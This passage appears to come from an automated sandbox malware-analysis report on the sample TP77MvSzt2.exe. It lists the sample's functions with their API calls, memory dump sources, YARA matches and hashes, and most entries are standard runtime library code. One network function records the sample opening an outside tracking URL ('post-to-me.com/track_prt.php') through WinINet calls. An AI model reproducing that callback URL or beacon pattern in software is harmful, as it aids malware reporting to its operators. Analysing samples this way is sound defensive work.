                                                                                  • SetLastError.KERNEL32(00000000,?,0483DAFC), ref: 0486225C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                  • Instruction ID: 907a14777d01afdf0ef5e03384d62ffe42f7bdbb2a69a337de9d49a2900ac70f
                                                                                  • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                  • Instruction Fuzzy Hash: D1014E7620570037D3523B2C6C44D1B631DAFC2B7A7100FF8F913E2388FEA0A5014026
                                                                                  Function 00431EFA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                  • _free.LIBCMT ref: 00431F31
                                                                                  • _free.LIBCMT ref: 00431F59
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                  • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                                                  • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                  • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                                                  Function 04862161 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                  • _free.LIBCMT ref: 04862198
                                                                                  • _free.LIBCMT ref: 048621C0
                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621CD
                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                  • Instruction ID: a9cef3c9b936f774d7cf7fc50f0fc743005619413a05c9790d677ce3bf8db92a
                                                                                  • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                  • Instruction Fuzzy Hash: 16F0F93514870037E291376CBC09B1A361A5BC2AAAB110FA8FD16D22D0FEA0B502452B
                                                                                  Function 00417940 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                  • String ID:
                                                                                  • API String ID: 4266703842-0
                                                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                                                  Function 04847BA7 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 048429C4: TlsGetValue.KERNEL32(?,?,04840DE2,04842EEF,00000000,?,04840DC0,?,?,?,00000000,?,00000000), ref: 048429CA
                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 04847BD1
                                                                                    • Part of subcall function 0485123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 04851261
                                                                                    • Part of subcall function 0485123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0485127A
                                                                                    • Part of subcall function 0485123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 048512F0
                                                                                    • Part of subcall function 0485123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 048512F8
                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 04847BDF
                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 04847BE9
                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 04847BF3
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04847C11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                  • String ID:
                                                                                  • API String ID: 4266703842-0
                                                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction ID: 2ec975f2db8baa9eea94217e05d21e9b6fe925cc7608c0025c2dbefc342314cb
                                                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction Fuzzy Hash: D6F0F635A0021C67DF16F77D981096EB7669FC0668B004B6AD801D3250EFA5BA4587C7
                                                                                  Function 00439E65 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00439E7D
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 00439E8F
                                                                                  • _free.LIBCMT ref: 00439EA1
                                                                                  • _free.LIBCMT ref: 00439EB3
                                                                                  • _free.LIBCMT ref: 00439EC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                                                  Function 0486A0CC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0486A0E4
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486A0F6
                                                                                  • _free.LIBCMT ref: 0486A108
                                                                                  • _free.LIBCMT ref: 0486A11A
                                                                                  • _free.LIBCMT ref: 0486A12C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction ID: 976c63ce94c03ac6a5e6da67ffda320cc11fb545e80229fe9ca456d480fb45ae
                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction Fuzzy Hash: 12F04F72405200AB96A4EB5CF8C2C1A73DAAA01391B640F59F40BE7710CF71F8908A5A
                                                                                  Function 0043174A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00431768
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 0043177A
                                                                                  • _free.LIBCMT ref: 0043178D
                                                                                  • _free.LIBCMT ref: 0043179E
                                                                                  • _free.LIBCMT ref: 004317AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                  • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                  • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                                                  Function 0041CCE5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                                                  • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 2583373041-0
                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                  • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                  • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                                                  Function 0484CF4C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0484CF56
                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0484CF87
                                                                                  • GetCurrentThread.KERNEL32 ref: 0484CF90
                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0484CFA3
                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0484CFAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 2583373041-0
                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                  • Instruction ID: cfd144ed808c2e3d6c60b4f5140a249f3846fc2f21e076fb45a693f08105fe85
                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                  • Instruction Fuzzy Hash: 50F0A036301A04AB8625FF28F9508BB77BAAFC46143010F4CED8786551CF65B902EB32
                                                                                  Function 048619B1 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 048619CF
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 048619E1
                                                                                  • _free.LIBCMT ref: 048619F4
                                                                                  • _free.LIBCMT ref: 04861A05
                                                                                  • _free.LIBCMT ref: 04861A16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                  • Instruction ID: 7229f8276a666e379ad75685e50424094e3f64b85154326f2850a81aa007a888
                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                  • Instruction Fuzzy Hash: C0F030B0C007119B9E616F18AC814043B61AF09662700076AF803D7372CBB4E862EB8F
                                                                                  Function 04832E8B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 04832EAE
                                                                                    • Part of subcall function 04831321: _wcslen.LIBCMT ref: 04831328
                                                                                    • Part of subcall function 04831321: _wcslen.LIBCMT ref: 04831344
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 048330C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InternetOpen_wcslen
                                                                                  • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                  • API String ID: 3381584094-4083784958
                                                                                  • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                                                  • Instruction ID: 2ce2117a234a4f6b5f694319c1fd5d828cfde88ba4c9d3dafcd0bc570b98339a
                                                                                  • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                                                  • Instruction Fuzzy Hash: D6517495E65344A8E320EFB0BC52B353378EF58712F10693BE518CB2B2E7A19944875E
                                                                                  Function 0042F738 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TP77MvSzt2.exe,00000104), ref: 0042F773
                                                                                  • _free.LIBCMT ref: 0042F83E
                                                                                  • _free.LIBCMT ref: 0042F848
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                  • API String ID: 2506810119-2945471316
                                                                                  • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                  • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                                                  • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                  • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                                                  Function 0485F99F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TP77MvSzt2.exe,00000104), ref: 0485F9DA
                                                                                  • _free.LIBCMT ref: 0485FAA5
                                                                                  • _free.LIBCMT ref: 0485FAAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                  • API String ID: 2506810119-2945471316
                                                                                  • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                  • Instruction ID: d018937cadfcb1c3da1bcb078f73801defd8d5085eb9384552afb4c02a029d30
                                                                                  • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                  • Instruction Fuzzy Hash: C3317B71E00258EFDB22DF99DC84D9EBBFCEF85718B104666EE05D7221D6B0AA40C751
                                                                                  Function 04853044 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 04853071
                                                                                    • Part of subcall function 04848AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 04848ADD
                                                                                  • SafeSQueue.LIBCONCRT ref: 0485308A
                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0485314A
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0485316B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04853179
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@
                                                                                  • API String ID: 3496964030-1785270423
                                                                                  • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                                                  • Instruction ID: 0572d8f89fad9ddc82c35ef07715435091a2d7c698ba2e03d7703522eea2c10e
                                                                                  • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                                                  • Instruction Fuzzy Hash: 3921C5357006059FDF16BF78C890A6D7BA1AF85354F044A99ED46CB362DB70F805CB92
                                                                                  Function 04859053 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,048621E4), ref: 0485E220
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,048621E4), ref: 0485E25A
                                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 0485E261
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1079102050-1785270423
                                                                                  • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                                                  • Instruction ID: 68cfbcaf487af696c4038f1a9be86378848a49230e6f0e356916c90781512af2
                                                                                  • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                                                  • Instruction Fuzzy Hash: 19112770640305AAFB05BB74AC0AB7D3764AF05B09F100F58FD02EB2E1DBE1B6008666
                                                                                  Function 0485E204 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,048621E4), ref: 0485E220
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,048621E4), ref: 0485E25A
                                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 0485E261
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1079102050-1785270423
                                                                                  • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                                                  • Instruction ID: 104da139935bb6726ce306d36fdca1346aaf0c83f5d1d9a079e444959a0f38a2
                                                                                  • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                                                  • Instruction Fuzzy Hash: ED110670640304AAFB05BB74AC0AB7D3761AF05B09F100F58FD06EB2E1DBE1BA019666
                                                                                  Function 0040EF4B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: 11@$f(@
                                                                                  • API String ID: 1452528299-1277599000
                                                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                  • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                  • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                                                  Function 00425F1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                                                    • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                                                    • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
